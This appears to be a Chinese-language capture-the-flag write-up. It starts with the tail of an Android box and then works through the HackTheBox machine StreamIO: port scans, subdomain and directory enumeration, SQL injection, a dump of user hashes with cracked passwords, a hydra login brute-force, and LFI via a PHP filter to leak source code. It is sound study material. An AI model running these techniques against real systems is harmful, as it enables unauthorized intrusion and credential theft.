app-asec data misc_ce ss vendor
app-ephemeral drm misc_de ssh_starter.sh vendor_ce
app-lib es_starter.sh nfc system vendor_de
app-private local ota system_ce
backup lost+found ota_package system_de
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
由于之前data
这个目录没有权限访问,现在以root身份重新访问也终于看到了最终的flag
总结
nmap扫描结果显示的都是一些比较陌生的非常规端口,因为我们的目标是一个陌生设备,所以这台机器主要还是锻炼信息搜集的思维,作为第一次接触androd设备渗透测试的入门机器挺合适的,可以了解androd的基本目录结构以及积累一些可能的有价值攻击路径,还有对安卓设备调试最常用的ADB
工具有基本的了解以及作为安卓提权手段经验的积累,相对来说的难点就是ssh的端口转发部分
StreamIO
“红队笔记”学习记录
机器介绍
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we use `WinPEAS` to enumerate the system and find saved browser databases, which are decoded to expose new credentials. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.
StreamIO 是一台中型计算机,它涵盖了导致 SQL 注入的子域枚举,以便检索存储的用户凭据,这些凭据被破解以获得对管理面板的访问权限。管理面板容易受到 LFI 的攻击,这使我们能够检索管理页面的源代码,并导致识别远程文件包含漏洞,滥用该漏洞可以让我们访问系统。在初始 shell 之后,我们利用 SQLCMD 命令行实用工具枚举数据库并获取横向移动中使用的更多凭据。作为次要用户,我们使用“WinPEAS”来枚举系统并查找已保存的浏览器数据库,这些数据库被解码以公开新凭据。使用 BloodHound 中的新凭据,我们发现用户能够将自己添加到可以读取 LDAP 密钥的特定组中。在没有直接访问帐户的情况下,我们使用 PowerShell 滥用此功能并将自己添加到“核心员工”组,然后访问 LDAP 以披露管理员 LAPS 密码。
难度
Medium
信息搜集
tcp全端口扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap --min-rate 10000 -sT -p- 10.129.226.249 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.82% done; ETC: 17:25 (0:00:11 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49744/tcp open unknown
52734/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 93.82 seconds
端口信息处理:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# export $ports
export: not an identifier: 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734
tcp详细扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap -sT -sC -sV -T4 -O -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:34 CST
NSOCK ERROR [202.3680s] mksock_bind_addr(): Bind to 0.0.0.0:902 failed (IOD #153): Address already in use (98)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-20 16:34:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2024-02-20T16:37:42+00:00; +6h59m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
52734/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (87%)
Aggressive OS guesses: Microsoft Windows Server 2019 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-02-20T16:37:05
|_ start_date: N/A
|_clock-skew: mean: 6h59m34s, deviation: 0s, median: 6h59m34s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.77 seconds
udp端口扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.226.249 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 29.75% done; ETC: 17:28 (0:02:57 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.27s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 1371.18 seconds
脚本漏扫:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:36 CST
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.30s latency).
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49744/tcp open unknown
52734/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 3048.36 seconds
扫描结果分析
从端口扫描的结果来看,这很有可能是一台域控制器,因为很多开放的端口以及服务都符合域控制器的特征,并且暴露了域名,且最大可能性是windows server2019,其中攻击面的优先级中,优先考虑smb(445)、ldap、web,另外,记住一遇到域名,先写入到本机的host
文件中。
wfuzz子域名爆破
为了保证信息搜集的完整性,可以进行子域名爆破,因为除了watch
,还可能存在其他可能有价值的子域名没有被nmap
扫描到,可以用wfuzz:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb -H "HOST: FUZZ.streamio.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
。。。
000004427: 404 6 L 24 W 315 Ch "www.biz - www.biz"
000004409: 404 6 L 24 W 315 Ch "mail07 - mail07"
000004423: 404 6 L 24 W 315 Ch "samp - samp"
000004413: 404 6 L 24 W 315 Ch "www.money - www.money"
000004417: 404 6 L 24 W 315 Ch "author - author"
000004418: 404 6 L 24 W 315 Ch "diablo - diablo"
000004415: 404 6 L 24 W 315 Ch "sydney - sydney"
000004420: 404 6 L 24 W 315 Ch "word - word"
000004416: 404 6 L 24 W 315 Ch "kraken - kraken"
000004419: 404 6 L 24 W 315 Ch "wwwww - wwwww"
000004412: 404 6 L 24 W 315 Ch "jg - jg"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 283.9004
Processed Requests: 4456
Filtered Requests: 0
Requests/sec.: 15.69564
并没有爆破出其他子域名
利用
尝试获取smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H 10.129.226.204
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbclient -L //10.129.226.204 -N
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb 10.129.226.204
SMB 10.129.226.204 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
虽然说没办法获取到smb下可访问的共享,但是crackmapexec
获取到了新的子域名dc.streamio.htb
,同样添加到host
文件中
smbmap多用于探测、扫描,获取结构类型的信息,在扫描smb映射上非常强大;smbclient多用于与smb服务进行交互,访问、获取资源;crackmapexec则功能综合很强大,在动态目录的评估上不可或缺,通过内置的标准的动态目录功能和协议实现的,所以对于一些终端保护、入侵检测和防御等设备的保护措施具有一定的免杀效果,它也依赖impact库,自己也有数据库,可以用
cmedb
命令来访问,比如:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cmedb
cmedb (default)(smb) > help
Documented commands (type help <topic>):
========================================
help
Undocumented commands:
======================
back creds exit export groups hosts import shares
cmedb (default)(smb) > hosts
+Hosts---+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| HostID | Admins | IP | Hostname | Domain | OS | SMBv1 | Signing |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| 1 | 0 Cred(s) | 10.129.228.115 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 2 | 0 Cred(s) | 10.129.207.210 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 3 | 0 Cred(s) | 10.129.229.178 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 4 | 1 Cred(s) | 10.129.229.198 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 5 | 0 Cred(s) | 10.129.226.204 | DC | STREAMIO | Windows 10.0 Build 17763 | 0 | 1 |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
另外,在域的搜集中还经常用到enum4linux
:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# enum4linux 10.129.226.204
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 21 14:17:48 2024
=========================================( Target Information )=========================================
Target ........... 10.129.226.204
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.226.204 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.226.204 )===============================
Looking up status of 10.129.226.204
No reply from 10.129.226.204
==================================( Session Check on 10.129.226.204 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
综上,针对于smb服务的攻击并没有太多有价值的发现
尝试访问web服务
发现无论是访问ip、还是主域名和子域名,页面总是回显同一个iis的默认页面:
并且查看源码后也没有什么发现,因此按照经验,可以做个目录爆破,看是否有什么隐藏目录可以利用:
目录爆破
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# gobuster dir -u http://streamio.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://streamio.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
与此同时,还可以爆破子域名的目录,与上面同理。
网站功能点初探
注意:由于我们上面访问的是http
的,还可以访问https
看看是否还是回显同样的页面,并不是:
是一个在线电影流媒体服务网站,大致地点击所有的功能点,寻找有价值信息,其中在about us
下面,有网站管理者和开发者的信息,这必须要保持敏感,因为很可能非常有价值,先记录下来,并且底部还有邮箱地址,也记录:
在contact us
的表单中,可以测试基本的xss漏洞:
虽然能够提交,但是如果并非反射型xss,除非我们能够找到存储该提交信息的页面,此时还不能说明不存在xss漏洞,暂时放弃,
查看控制台的网络
:
说明该iis
服务配置的是支持asp
也还可能支持asp.net
,并且暴露了php版本,这些信息暂时记录下来,所以后续利用时,不要忘记对aspx
的利用。
另外,有个登录表单,尝试sql注入:
尝试弱密码以及注册再登陆后,都无法成功
分别对https
的这两个网站也进行目录爆破,然后放在一边
注意:这里存在证书的问题
Error: error on running gobuster: unable to connect to https://streamio.htb/: Get "https://streamio.htb/": tls: failed to verify certificate: x509: certificate has expired or is not yet valid: current time 2024-02-21T15:05:43+08:00 is after 2022-03-24T07:03:28Z
加个-k
参数即可解决,然后继续探测子域名watch
网站的功能点:
只有一个订阅可尝试利用,输入邮箱后也没有什么特别的
对于资产较多的环境中,在目录爆破时,最好再用另一个目录爆破工具进行交叉验证:
比如feroxbuster
:
┌──(root㉿hunter)-[/home/cvestone]
└─# feroxbuster -u https://streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c https://streamio.htb/images => https://streamio.htb/images/
301 GET 2l 10w 150c https://streamio.htb/admin => https://streamio.htb/admin/
301 GET 2l 10w 147c https://streamio.htb/js => https://streamio.htb/js/
301 GET 2l 10w 148c https://streamio.htb/css => https://streamio.htb/css/
200 GET 231l 571w 7825c https://streamio.htb/about.php
。。。
其中,在这几次目录爆破中,发现的有价值信息如下:
200 GET 2l 6w 58c https://streamio.htb/admin/master.php
200 GET 7193l 19558w 253905c https://watch.streamio.htb/search.php
200 GET 20l 47w 677c https://watch.streamio.htb/blocked.php
/images (Status: 301) [Size: 151] [--> https://streamio.htb/images/]
/Images (Status: 301) [Size: 151] [--> https://streamio.htb/Images/]
/admin (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]
/css (Status: 301) [Size: 148] [--> https://streamio.htb/css/]
/js (Status: 301) [Size: 147] [--> https://streamio.htb/js/]
/fonts (Status: 301) [Size: 150] [--> https://streamio.htb/fonts/]
/IMAGES (Status: 301) [Size: 151] [--> https://streamio.htb/IMAGES/]
/Fonts (Status: 301) [Size: 150] [--> https://streamio.htb/Fonts/]
/Admin (Status: 301) [Size: 150] [--> https://streamio.htb/Admin/]
/*checkout* (Status: 400) [Size: 3420]
/CSS (Status: 301) [Size: 148] [--> https://streamio.htb/CSS/]
/JS (Status: 301) [Size: 147] [--> https://streamio.htb/JS/]
访问几个关键的目录:
而这些很多关键信息只有feroxbuster
才扫得到,所以很多时候仅仅只用一个工具是不够的
其中,master.php
提供了很关键的信息,表明只有通过includes
方式才能访问到该页面,推测可能和文件包含漏洞相关。并且blocked.php
的出现说明后端很可能存在waf,某些通用行为很可能被拦截。这里的子域名网站中暴露了搜索页面search.php
,显然和数据库交互有关,可以尝试sql注入
sql注入
探针:
发现支持模糊匹配搜索、不区分大小写搜索,说明后端数据库的sql语句可能类似如下:
SELECT * FROM movies WHERE name LIKE '%[input]%'
;
当我们拼接一些sql注入的特殊符号时,发现也能正常返回结果:
说明存在sql注入漏洞,因为正常来说它不应该被代入后端数据库执行成功,而当我们尝试直接输入一些通用的sql语句时,被waf拦截了,比如包含all(这里虽然写拦截5分钟,但是作为靶机,我们只要重新返回提交表单的页面即可重新搜索)
开始标准的sql注入流程:
找到注入点,尝试获取更多数据:
版本信息:
获取数据库:
显然当前数据库是STREAMIO
,另外要注意streamio_backup
也很重要,这两个数据库中都很有可能获取可以撞库的凭据信息
查看当前数据库:
获取当前数据库中所有用户表的名称和标识符:
记录下这两个对应的id,继续获取相应字段名称:
获取关键凭据:
提取出所有的凭据并处理数据:
先复制所有凭据所在div
中的html代码:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# head -n 20 creds_in_html.txt
<div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">admin :665a50ac9eaa781e4f7f04199db97a11 </h5>
</div>
<div class="ms-auto p-2">
<span class="">3</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Alexendra :1c2b3d8270321140e5153f6637d3ee53 </h5>
</div>
<div class="ms-auto p-2">
<span class="">3</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div><div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">Austin :0049ac57646627b8d7aeaccf8b6a936f </h5>
</div>
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# grep h5 creds_in_html.txt | sed -e 's/<h5 class="p-2">//g' -e 's/<\/h5>//g' | tr -d " \t" | tee creds.txt
admin:665a50ac9eaa781e4f7f04199db97a11
Alexendra:1c2b3d8270321140e5153f6637d3ee53
Austin:0049ac57646627b8d7aeaccf8b6a936f
Barbra:3961548825e3e21df5646cafe11c6c76
Barry:54c88b2dbd7b1a84012fabc1a4c73415
Baxter:22ee218331afd081b0dcd8115284bae3
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon:35394484d89fcfdb3c5e447fe749d213
Clara:ef8f3d30a856cf166fb8215aca93e9ff
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield:8097cedd612cc37c29db152b6e9edbd3
Gloria:0cfaaaafb559f081df2befbe66686de0
James:c660060492d9edcaa8332d89c99c9239
Juliette:6dcd87740abb64edfa36d170f0d5450d
Lauren:08344b85b329d7efd611b7a7743e8a09
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer:7df45a9e3de3863807c026ba48e55fb3
Michelle:b83439b16f844bd6ffe35c02fe21b3c0
Oliver:fd78db29173a5cf701bd69027cb9bf6b
Robert:f03b910e2bd0313a23fdd7575f34a694
Robin:dc332fb5576e9631c9dae83f194f8e70
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Samantha:083ffae904143c4796e464dac33c1f7d
Stan:384463526d288edcc95fc3701e523bc7
Thane:3577c47eb1e12c8ba021611e1280753c
Theodore:925e5408ecb67aea449373d668b7359e
Victor:bf55e15b119860a6e6b5a164377da719
Victoria:b22abb47a02b52d5dfa27fb0b534f693
William:d62be0dc82071bccc1322d64ec5b6c51
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
破解凭据hash
先随便复制其中一个hash值,识别hash类型:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hash-identifier 3961548825e3e21df5646cafe11c6c76
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
。。。
识别出是MD5
加密方式,开始尝试破解:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0
hashcat (v6.2.6) starting
。。。
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
保存成新的凭据文件,再分别将用户名和密码存储为单独的文件:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1 > user
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f3 > pass
尝试爆破smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u user -p pass --continue-on-success
。。。
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
。。。
显然这些凭据不能用于获取smb共享,既然系统级别无法连接,我们还可以尝试web级别,因为之前还有一个登录页面:
尝试爆破web登录
由于破解时不再需要hash,再对数据进行处理:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1,3 | tee userpass
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
开始爆破,注意爆破前先了解清楚相关的表单名和错误页面提示关键词:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-25 17:09:40
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-25 17:09:45
利用该凭据,我们成功登录web,与之前的页面没什么差别,尝试访问admin
目录,发现通过该凭据可以访问后台控制台:
这个页面特别简陋,一看就不像是利用公开的cms框架等方式搭建的,很大可能性是自己写的,所以这种情况出现漏洞的可能性也很大。大致浏览该后台页面的功能点后,暂时也没有什么很大的利用价值,但由于点击每个功能点时,url中发生了变化,每个功能点有对应的参数,那么很有可能存在隐藏的参数,这从开发者的开发习惯来说是存在这种可能的,因此可以尝试fuzz
尝试爆破url参数
注意因为这是登录状态下进行爆破,记得指定当前的cookie值:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93"
。。。
000000791: 200 49 L 131 W 1678 Ch "batchExtend"
000000790: 200 49 L 131 W 1678 Ch "batch"
000000789: 200 49 L 131 W 1678 Ch "baslik"
000000788: 200 49 L 131 W 1678 Ch "basket"
000000787: 200 49 L 131 W 1678 Ch "basic"
000000786: 200 49 L 131 W 1678 Ch "baseurl"
000000785: 200 49 L 131 W 1678 Ch "basemodule"
。。。
# 第一次执行时先要排除到响应体中长度特别长并且占大多数的,这里是1678
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93" --hh 1678
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001575: 200 49 L 137 W 1712 Ch "debug"
000003530: 200 10790 25878 W 320235 Ch "movie"
L
000005450: 200 398 L 916 W 12484 Ch "staff"
000006133: 200 62 L 160 W 2073 Ch "user"
Total time: 0
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 0
发现确实存在隐藏参数debug
,尝试访问:
除了一个提示外没有什么特别的,源码也看不出什么,但是回顾之前目录爆破时爆破出的隐藏文件/admin/master.php
提示需要被包含才能访问,正好这里有一个?debug=
参数,尝试作为该参数的值,即包含,发现确实能访问,这个文件的内容正好是这些已有功能点的集合:
这看起来感觉没有什么用处,但正是根据当前情景,我们可以大胆推测很可能存在文件包含漏洞,正常来说我们无法访问该php文件的源码,因为当浏览器包含、访问它时就会自动被解析,但当前又是处在调试模式,所以可以通过php的伪协议来获取该php源码
利用文件包含漏洞泄漏php源码
我们可以先利用伪协议将包含的php文件先编码成base64格式,然后复制到本地后再解码查看:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat master_base64 | base64 -d | tee master.php
。。。
php代码审计
